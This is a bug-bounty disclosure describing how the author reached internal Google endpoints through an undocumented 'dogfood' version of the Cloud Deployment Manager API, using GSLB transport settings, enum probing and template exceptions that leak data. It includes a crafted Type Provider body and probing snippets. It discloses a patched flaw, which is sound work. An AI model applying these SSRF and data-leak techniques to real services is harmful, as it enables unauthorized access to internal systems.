RCE in Google Cloud Deployment Manager

TL;DR

By using an internal test (dogfood) version of Google Cloud Deployment Manager, I was able to issue requests to some internal Google endpoints (Through GSLB), which could have led to RCE.

This could be achieved through a request to the Deployment Manager with this format, which begins an asynchronous Operation.
The Operation attempts to send a GET request to the specified endpoint's descriptor URL, and expects a descriptor document as the response.
If it fails, the error message might still leak internal information; if it succeeds, more complex internal requests can be issued.

Examples: App Engine Admin API (Internal test version), Issue Tracker Corp API.
Note that the issue is not limited to requests to APIs; it just works best on them. Example of a non-API endpoint: Google Accounts and ID Administration ("GAIA") backend, Test endpoint. The descriptorUrl doesn't matter there, since it is not an API.

Google paid $31,337.00 as a reward for the bug report.

Intro

Google Cloud is full of exciting computing services, such as Compute Engine, Dataflow, and BigQuery, and among those services you can find the Cloud Deployment Manager.
Deployment Manager is a Google Cloud service that provides a way to create, modify, and delete resources through an API.
This is done through Deployments, which define one or more Resources, each of a given Type. These Deployments can specify Python and Jinja2 templates to programmatically set some options.

There are several predefined Types, and in the Deployment Manager API v2beta version, Google added Type Providers, which allow users to create their own custom Types by providing a descriptor document.


And, whenever something is mutated (created, modified, or deleted) through the Deployment Manager API, an Operation is returned, which can be polled to check for completion or error.
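To make the Operation lifecycle concrete, here is a minimal polling sketch. It assumes the documented Operation shape (a `status` field that eventually becomes `DONE`, plus an optional `error` object holding an `errors` list). The `fetch` callable is a hypothetical stand-in for an authenticated GET on the Operation, injected so the loop can run without network access.

```python
import time
from typing import Any, Callable, Dict


def wait_for_operation(
    fetch: Callable[[], Dict[str, Any]],
    poll_interval: float = 2.0,
    max_polls: int = 60,
) -> Dict[str, Any]:
    """Poll an Operation until its status is DONE, then return it.

    `fetch` is assumed to GET .../global/operations/<NAME> and return
    the decoded JSON body.
    """
    for _ in range(max_polls):
        op = fetch()
        if op.get("status") == "DONE":
            # A finished Operation may still carry an error object.
            if "error" in op:
                errors = op["error"].get("errors", [])
                messages = "; ".join(e.get("message", "") for e in errors)
                raise RuntimeError(f"Operation failed: {messages}")
            return op
        time.sleep(poll_interval)
    raise TimeoutError("Operation did not finish in time")
```

The error branch matters for this write-up: most of the interesting data surfaced through failed Operations' error messages.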

Note
Google Cloud Deployment Manager is a bit hard to understand at first glance. If you are interested in it, I would recommend playing around with it, especially through the v2beta REST API. Read the docs and try creating Deployments and Type Providers to get a feel for it.
I tried to link useful resources throughout this write-up, hoping they will make it easier to understand.

Security research

My first approach to researching the Deployment Manager was to look for hidden/internal Types, since some Google services (Such as Google App Engine Flexible) use the Deployment Manager internally (You can see it in your project's logs when deploying an app), but I found none.

Then, I looked at the Jinja2 and Python templates of the Deployments.
Through some trial and error, I was able to create Deployments with specially crafted templates that would return data as Python exceptions in their Operations.

This way, I was able to inspect the Python libraries, read the Python code, and list/read files, but the script that interprets the templates runs in an isolated container with zero privileges, not even network connectivity.
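Deployment Manager Python templates define a `GenerateConfig(context)` function that normally returns the resources to create. The sketch below is a hypothetical reconstruction of the exception trick, not the exact templates I used: instead of returning a config, the template raises an exception whose message carries whatever it gathered, so the data surfaces in the failed Operation's error.

```python
import os
import sys


def GenerateConfig(context):
    """Hypothetical template that leaks interpreter details via an exception."""
    details = {
        "python": sys.version.split()[0],
        "cwd": os.getcwd(),
        # Listing the working directory as an example of file access.
        "files": sorted(os.listdir(".")),
    }
    # Raising instead of returning a config makes the deployment fail,
    # and the exception text ends up in the Operation's error message.
    raise Exception(repr(details))
```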

After those attempts, I tried creating Type Providers pointing to internal Google Corp APIs, such as issuetracker.corp.googleapis.com, but the Operations always failed with an error saying they did not receive a valid JSON response, and showing the HTML of the login page that issuetracker.corp.googleapis.com redirects to (When accessed externally).
And specifying any private IP address failed with an error saying it was not a valid address (Attempts to bypass it, with domains and redirections pointing to private IPs, gave the same result).

These failed attempts were quite demotivating, so I did not continue researching the Deployment Manager for a while (Keep in mind I did not do all this research in a single day; it was a very slow process).


One day, I decided to look into the Deployment Manager API methods by enabling the API in the Cloud Console, going to its metrics page, and looking at the Filters section, which has a drop-down list titled Methods that lists all of them, including undocumented ones. Method names usually include the API version.


I noticed there were two more API versions besides v2 and v2beta (The documented ones), called alpha and dogfood.
And I could call methods on those versions, just by replacing v2 or v2beta with either alpha or dogfood in every API call.
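Since only one path segment changes, switching versions is trivial. A minimal sketch, assuming the public `https://www.googleapis.com/deploymentmanager` base URL and the `/<VERSION>/projects/<PROJECT>/global/...` layout; `my-project` is a placeholder project ID. The `$outputDefaults` system parameter, which comes up later in this write-up, is included as an option.

```python
BASE = "https://www.googleapis.com/deploymentmanager"


def dm_url(version: str, project: str, collection: str,
           output_defaults: bool = False) -> str:
    """Build a Deployment Manager collection URL for any API version.

    version: e.g. "v2", "v2beta", "alpha" or "dogfood"; it is the only
    path segment that differs between versions.
    """
    url = f"{BASE}/{version}/projects/{project}/global/{collection}"
    if output_defaults:
        # Asks the API to also return fields that are left at their defaults.
        url += "?$outputDefaults=true"
    return url


documented = dm_url("v2beta", "my-project", "typeProviders")
internal = dm_url("dogfood", "my-project", "typeProviders", output_defaults=True)
```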

I played around a bit with the alpha version, but I did not find anything interesting in it.

The dogfood version was a bit more interesting though, especially because I had noticed the word dogfood being used for internal testing in Google services.

When I listed the Types on that version, most of them returned an extra field: googleOptions.
When I listed my own Type Providers, they also included this extra field, and by specifying the $outputDefaults system parameter in my query, I could see that googleOptions contained the following fields (Along with the values I found at first glance, and their effect when I specified them while creating a Type Provider of my own):

  • injectProject
    Boolean, I could not figure out what it does; the API always set it to false on my Type Providers, regardless of the value I specified.
  • deleteIntent
    Enum, the only valid value I found was CREATE_OR_ACQUIRE, I am not sure what its effect might be.
  • isLocalProvider
    Boolean, I am not sure what it is for. Whenever I set it to true, the Type Provider was created successfully, but creating Deployments that used it always failed with an error saying the descriptor document could not be retrieved.
  • ownershipKind
    Enum, the possible values were UNKNOWN, USER and GOOGLE. I did not notice any effects by setting it to different values, but I always set it to GOOGLE just in case.
  • transport
    Enum, the possible values were UNKNOWN_TRANSPORT_TYPE and HARPOON. I did not notice any special effects with those values.
  • credentialType
    Enum, the possible values were UNKNOWN_CREDENTIAL_TYPE and OAUTH. I did not notice any special effects with those values.
  • gslbTarget
    String, either empty or something like blade:<TARGET> or gslb:<TARGET>.
  • descriptorUrlServerSpec
    String, either the same as gslbTarget or empty.
A couple of examples of what this looked like:

This was very promising: GSLB is Google's Global Software Load Balancer, and when provided a symbolic name, it directs traffic to a linked BNS (Borg Naming Service) address, according to the SRE Book.

It surely looks like this could be used as SSRF to internal servers!

I had noticed blade:<TARGET> and gslb:<TARGET> before, while researching other services on Google Cloud, so I tried them on gslbTarget and descriptorUrlServerSpec, but they did not seem to have any effect.

I then tried to brute force the possible credentialType values, and found a new one: GAIAMINT (I had seen that name referenced before, for example, in this Google Git commit)
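The brute force amounts to trying candidate names and keeping the ones the API does not reject as invalid. A hypothetical sketch: `try_value` stands in for a create Type Provider call with `credentialType` set to the candidate, returning the error message or `None` on success. The `"Invalid value"` substring is an assumption about how enum rejections are worded, not a confirmed API message.

```python
from typing import Callable, Iterable, List, Optional


def find_valid_enum_values(
    candidates: Iterable[str],
    try_value: Callable[[str], Optional[str]],
    reject_marker: str = "Invalid value",
) -> List[str]:
    """Return the candidates the API did not reject as invalid enum values."""
    valid = []
    for name in candidates:
        error = try_value(name)
        # Any other error (quota, permissions...) still means the value parsed.
        if error is None or reject_marker not in error:
            valid.append(name)
    return valid
```

Treating unrelated errors as "valid" is deliberate: a value that gets past enum parsing and fails later is exactly what a brute force like this is looking for.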

When testing Deployments with a Type Provider using that value, I noticed that a fake API I had set up no longer received an access token in the Authorization header (The usual behavior); instead, the header was set to something like: EndUserCreds 1 <URL-safe Base64 data> (Example).

I am not sure how to decode that, but it looks like it has some protobuf data inside some other binary format, and some strings can be retrieved: anonymous, 331656524293@cloudservices.gserviceaccount.com (The email of the service account Deployment Manager uses for tokens on my project), cloud-dm and cloudgaia::vjgv73:9898.
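Pulling readable strings out of such a header works much like the `strings` utility. A minimal sketch, assuming the header value is exactly `EndUserCreds 1 <URL-safe Base64 data>` and that the Base64 part may have its `=` padding stripped; it makes no attempt to parse the protobuf structure itself.

```python
import base64
import re
from typing import List


def extract_strings(header: str, min_len: int = 6) -> List[str]:
    """Decode an 'EndUserCreds 1 <data>' header and list printable ASCII runs."""
    scheme, _version, data = header.split(" ", 2)
    if scheme != "EndUserCreds":
        raise ValueError("unexpected scheme")
    # Restore any stripped '=' padding before decoding.
    data += "=" * (-len(data) % 4)
    raw = base64.urlsafe_b64decode(data)
    # Runs of printable ASCII, similar to the `strings` command-line tool.
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, raw)]
```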
This looks like it is intended for internal use, and some Googlers confirmed it is meant for authentication between internal Google systems; it should not be possible to use it externally.

Besides this, I was unable to brute force any other valid values for credentialType, nor any value for transport.

At this point I also tried adding staging_ to the beginning of the API version, since I had noticed the Google Compute Engine API does that for its Staging environment (A fact mentioned in a few places, like this GitHub PR), and it worked!
But the Staging environment seemed to work exactly the same way as the Production one.

After several failed attempts to achieve anything significant, I stopped researching Deployment Manager for a couple weeks.
During that break, I took part in some cool research on Google Cloud SQL with Wouter, during which an SRE greeted us! (Write-up pending; the issue hasn't been fixed just yet)

The same week the Cloud SQL report was submitted, I got the idea of using Proto over HTTP to find the missing values of the credentialType and transport Enums: in protobuf, Enums are represented as numbers, not strings, so I could simply try numbers instead of guessing names.
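On the wire, an enum field is just a field key followed by a varint, where the key is `(field_number << 3) | wire_type` and wire type 0 means varint. Any integer can therefore be sent, including ones whose names are unknown. A minimal sketch of that encoding; field number 7 is hypothetical and not the real `credentialType` tag.

```python
def encode_varint(value: int) -> bytes:
    """Encode a non-negative integer as a protobuf base-128 varint."""
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)  # high bit set: more bytes follow
        else:
            out.append(byte)
            return bytes(out)


def encode_enum_field(field_number: int, enum_value: int) -> bytes:
    """Encode one enum field: key with wire type 0, then the value."""
    key = (field_number << 3) | 0
    return encode_varint(key) + encode_varint(enum_value)


# Probe enum values 0..5 for a hypothetical field number 7.
probes = [encode_enum_field(7, n) for n in range(6)]
```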

Proto over HTTP is an experimental gRPC fallback feature in some Google APIs. It is not very well documented, its availability varies per API, and different APIs might implement it a bit differently.
When I tried it on the Deployment Manager API, I found out:

  • URLs stay the same (/deploymentmanager/<VERSION>/projects/<PROJECT>/global/...)
  • The Content-Type header needs to be set to application/x-protobuf
  • In Production, it fails with the message: Proto over HTTP is not allowed for service
  • It works in Staging!
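Putting those observations together, a Proto over HTTP call differs from a JSON one only in its body and `Content-Type`. A sketch that just builds the request without sending it. The base URL, version string, project, and bearer token are all caller-supplied placeholders, since the exact Staging host/version combination is an assumption here.

```python
import urllib.request


def build_proto_request(base_url: str, version: str, project: str,
                        body: bytes, token: str) -> urllib.request.Request:
    """Build (but do not send) a Proto over HTTP create-Type-Provider call."""
    url = (f"{base_url}/deploymentmanager/{version}"
           f"/projects/{project}/global/typeProviders")
    return urllib.request.Request(
        url,
        data=body,  # serialized protobuf message instead of JSON
        method="POST",
        headers={
            "Content-Type": "application/x-protobuf",
            "Authorization": f"Bearer {token}",
        },
    )
```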

After some meddling with it, I reverse-engineered the proto definition by creating Type Providers with different values through Proto over HTTP, decoding the raw protobuf responses with protoc --decode_raw, and looking for the new values in the normal JSON API.
Through this, I got a good enough approximation, and found these new values for the Enums:
  • transport 
    • GSLB - Under certain circumstances it makes the create Type Provider operation fail with 503 Service Unavailable
  • credentialType 
    • ENDUSERCREDS, TYPE_CREDENTIAL - They seem to act the same way as OAUTH and UNKNOWN_CREDENTIAL_TYPE 
    • UNKNOWN_CT_5 - I never found out the real name for this one; the API always returned an empty protobuf response when I set the Enum to this value, and the create Type Provider Operation was never even started
After a bit more meddling with these, I found out that setting transport to GSLB was the key to issuing internal requests!
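For readers unfamiliar with `protoc --decode_raw`: it prints field numbers and values without needing a `.proto` file. Below is a minimal stand-in for that idea, not protoc itself. It handles only varint and length-delimited fields (wire types 0 and 2), which is roughly enough to spot where an enum's number lands in a response. The sample bytes in the test are made up.

```python
from typing import List, Tuple


def read_varint(buf: bytes, pos: int) -> Tuple[int, int]:
    """Read a base-128 varint starting at pos; return (value, new_pos)."""
    result, shift = 0, 0
    while True:
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7


def decode_raw(buf: bytes) -> List[Tuple[int, object]]:
    """Decode top-level fields into (field_number, value) pairs."""
    fields: List[Tuple[int, object]] = []
    pos = 0
    while pos < len(buf):
        key, pos = read_varint(buf, pos)
        field_number, wire_type = key >> 3, key & 0x7
        if wire_type == 0:  # varint: ints, bools, enums
            value, pos = read_varint(buf, pos)
        elif wire_type == 2:  # length-delimited: strings, bytes, messages
            length, pos = read_varint(buf, pos)
            value = buf[pos:pos + length]
            pos += length
        else:
            raise ValueError(f"unsupported wire type {wire_type}")
        fields.append((field_number, value))
    return fields
```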

The bug

With the newly discovered GSLB value for transport, I could craft Type Providers such that the Deployment Manager issued requests to internal Google endpoints... As long as I knew where to point gslbTarget.

Here is an example of creating a Type Provider for the Google App Engine Admin API - Test environment (Which, since my 2018 GAE RCE, has been blocked externally with a 429 error).

I got blade:apphosting-admin by listing Types on the dogfood version, the appengine.v1.version Type had gslbTarget set to this value.
I added -nightly at the end because, before the GAE Test API got blocked externally in 2018, I had noticed the string nightly a lot in it.

This Type Provider worked flawlessly, and I successfully created a Deployment that used it to launch a new app into GAE Test to check if my 2018 bug had been fixed properly (It was).
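Based on the googleOptions fields listed earlier, the body of such a Type Provider would have had roughly the following shape. This is a hypothetical sketch, not the original request: the provider name is made up, descriptorUrl is left as a placeholder because the real value isn't given here, and the exact field set the dogfood API accepted may differ.

```python
import json


def gslb_type_provider(name: str, gslb_target: str, descriptor_url: str) -> dict:
    """Build a hypothetical dogfood Type Provider body routed through GSLB."""
    return {
        "name": name,
        "descriptorUrl": descriptor_url,
        "googleOptions": {
            "transport": "GSLB",
            "gslbTarget": gslb_target,
            # Always set to the same value as gslbTarget during the research.
            "descriptorUrlServerSpec": gslb_target,
            "ownershipKind": "GOOGLE",
        },
    }


body = gslb_type_provider(
    name="gae-admin-test",                  # hypothetical name
    gslb_target="blade:apphosting-admin-nightly",
    descriptor_url="<DESCRIPTOR_URL>",      # placeholder, real value not shown
)
print(json.dumps(body, indent=2))
```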

If I specified an invalid gslbTarget (And I always set descriptorUrlServerSpec to the same value as gslbTarget), the Operation for creating the Type Provider would fail with one of: an error saying it could not connect to the GSLB endpoint; the error the endpoint itself returned (Sometimes something like a 404); or an error saying the response was not JSON (For example, some endpoints returned HTML), along with the response data.
One endpoint even returned an error page with a Java stack trace and a message along the lines of: Debugging information, only visible to internal IPs!
Therefore, I could retrieve some internal information this way.

If I specified some valid gslbTarget, like blade:corp-issuetracker-api for issuetracker.corp.googleapis.com (I got the GSLB name from some of my past research), I would be able to perform calls to the API!
Even though I had no idea what the format of Issue Tracker's resources would be like, this could easily be overcome by calling listTypes on the new Type Provider.
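In v2beta, listTypes is a GET on `.../global/typeProviders/<NAME>/types`. A small sketch that builds that URL and collects the type names, following pagination. `fetch_json` is a hypothetical injected helper for the authenticated GET, and the `types`, `name`, and `nextPageToken` response fields are assumed from the v2beta reference.

```python
from typing import Any, Callable, Dict, List
from urllib.parse import urlencode

BASE = "https://www.googleapis.com/deploymentmanager"


def list_type_names(fetch_json: Callable[[str], Dict[str, Any]],
                    version: str, project: str, provider: str) -> List[str]:
    """Collect type names from typeProviders.listTypes, following pages."""
    url = f"{BASE}/{version}/projects/{project}/global/typeProviders/{provider}/types"
    names: List[str] = []
    page_token = None
    while True:
        query = ("?" + urlencode({"pageToken": page_token})) if page_token else ""
        page = fetch_json(url + query)
        names.extend(t["name"] for t in page.get("types", []))
        page_token = page.get("nextPageToken")
        if not page_token:
            return names
```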

These were interesting issues, but I was a bit doubtful of their impact, especially since requests were being made with my project's Deployment Manager service account credentials, which would probably be restricted in which endpoints they could talk to.

While researching this, I had told some Googlers that I had found a way to perform requests to GSLB endpoints, and they told me to write it down in a VRP grant ticket, so the SRE team would have a heads-up about what I was up to in case they detected my requests.

They also explained one potential issue with requests to GSLB endpoints:

If service A makes a request to service B on behalf of user C, the authorization of user C is checked. If there are no credentials for C, then the authorization of A is checked instead.

This was really interesting, since I had noticed that the service account credentials used by Deployment Manager were delegated by cloud-dm-staging@prod.google.com (I could see the delegator's ID in the Cloud Console logs), and I assume it means it has, at least, permissions to delegate tokens for some service accounts.

I would just have to find a way to remove the service account's credentials from the requests, so that the Deployment Manager's own identity would be checked instead.
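A toy model of the rule the Googlers described, only to make the consequence explicit. It is not how Google's systems implement authorization. The principals in the test are taken from this write-up, but the allow-list is made up.

```python
from typing import Optional, Set


def is_authorized(caller: str, end_user: Optional[str], allowed: Set[str]) -> bool:
    """Service `caller` calls a backend on behalf of `end_user`.

    If end-user credentials are present, they are what gets checked;
    otherwise the backend falls back to checking the calling service.
    """
    principal = end_user if end_user is not None else caller
    return principal in allowed
```

Under this model, a request carrying the project's service account credentials is judged by that account's permissions, while the same request without them falls through to the Deployment Manager's own, likely broader, identity.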

By this time, it was night in Uruguay, so I just wrote down my research in the grant ticket and stopped researching for the day.


The next morning, my dogs woke me up at about 6 AM, and I noticed notifications of updates on the grant ticket, including one that arrived just as I was reading them:

Eduardo then quickly submitted a VRP report for me, triaged it, escalated it to P0 S0, and replied "Nice catch!".
It took less than 5 minutes from report submission to "Nice catch!", maybe the fastest RCE VRP report ever :).

Later that day, I asked Eduardo a few questions, and he told me this bug was now being treated as an incident, though it seems RCE bugs are usually treated that way.
Because of this, they asked me to stop further research into it, and send them the details of my actions and findings.

I asked how this issue could potentially have been exploited, and my understanding is:

  • Privilege escalation may be achieved through the identity of the Deployment Manager service (cloud-dm-staging@prod.google.com), which might have access to internal services that a normal service account would not have access to
  • It is not known if there are attack vectors that would allow an attacker to achieve a shell into Google's internal systems, but the privileges could be high enough

Because of this probable maximum impact, Google treated this as RCE, and issued a $31,337.00 reward (Their current standard amount for RCE).



Thanks so much to the Google VRP!
It was a very interesting bug to research, and I would love to see what other issues could be found in Google Cloud Deployment Manager.


Extra notes

The issue has now been fixed. The fix seems to just be that now gslbTarget and descriptorUrlServerSpec are ignored when specified on a create, patch, or update Type Provider operation.
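Judging only from the observed behavior, the fix could look something like the following: the two routing fields are dropped from user-supplied googleOptions on mutating calls before the Type Provider is stored. This is a guess at the shape of such a fix, not Google's code; the function and constant names are hypothetical.

```python
from typing import Any, Dict

IGNORED_OPTIONS = ("gslbTarget", "descriptorUrlServerSpec")
MUTATING_METHODS = {"create", "patch", "update"}


def sanitize_type_provider(method: str, body: Dict[str, Any]) -> Dict[str, Any]:
    """Return a copy of the request body without the GSLB routing fields."""
    if method not in MUTATING_METHODS:
        return body
    cleaned = dict(body)
    options = dict(cleaned.get("googleOptions", {}))
    for field in IGNORED_OPTIONS:
        options.pop(field, None)
    if options:
        cleaned["googleOptions"] = options
    else:
        cleaned.pop("googleOptions", None)
    return cleaned
```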
The dogfood version might still be accessible for a while on the API, but that does not mean it is a security issue by itself. There could be some hidden security hole in it though ;).

Also, after reporting my findings to Google, and even after finishing the first few drafts of this write-up, I had the idea of checking whether the Discovery Document for the dogfood version of the Staging Deployment Manager API could be accessed publicly.
Lo and behold, it can: https://staging-deploymentmanager.sandbox.googleapis.com/$discovery/rest?version=dogfood (Copy on GitHub, just in case it stops working in the future).
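Checking a Discovery Document for a field like googleOptions only takes a walk over its `schemas` section. A sketch, assuming the standard Discovery format where each schema has a `properties` map; it only looks at top-level schemas, not nested ones.

```python
from typing import Any, Dict, List


def schemas_with_property(discovery: Dict[str, Any], prop: str) -> List[str]:
    """Return names of top-level schemas that declare the given property."""
    return sorted(
        name
        for name, schema in discovery.get("schemas", {}).items()
        if prop in schema.get("properties", {})
    )


# Possible usage against the document above (network access required):
#   import json, urllib.request
#   url = ("https://staging-deploymentmanager.sandbox.googleapis.com"
#          "/$discovery/rest?version=dogfood")
#   with urllib.request.urlopen(url) as resp:
#       print(schemas_with_property(json.load(resp), "googleOptions"))
```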

The Discovery Document includes the googleOptions field, and provides a little bit more insight into what its fields do, but not nearly enough, so even if I had noticed the document before, I would have probably had to perform the same steps I performed during my research.

Timeline

  • May 7th, 2020: Issue found and mentioned in a VRP grant ticket
  • May 8th, 2020: Googler checks the issue, submits RCE report and quickly escalates it
  • May 19th, 2020: Reward of $31,337.00 issued
  • May 20th, 2020: Issue confirmed as fixed
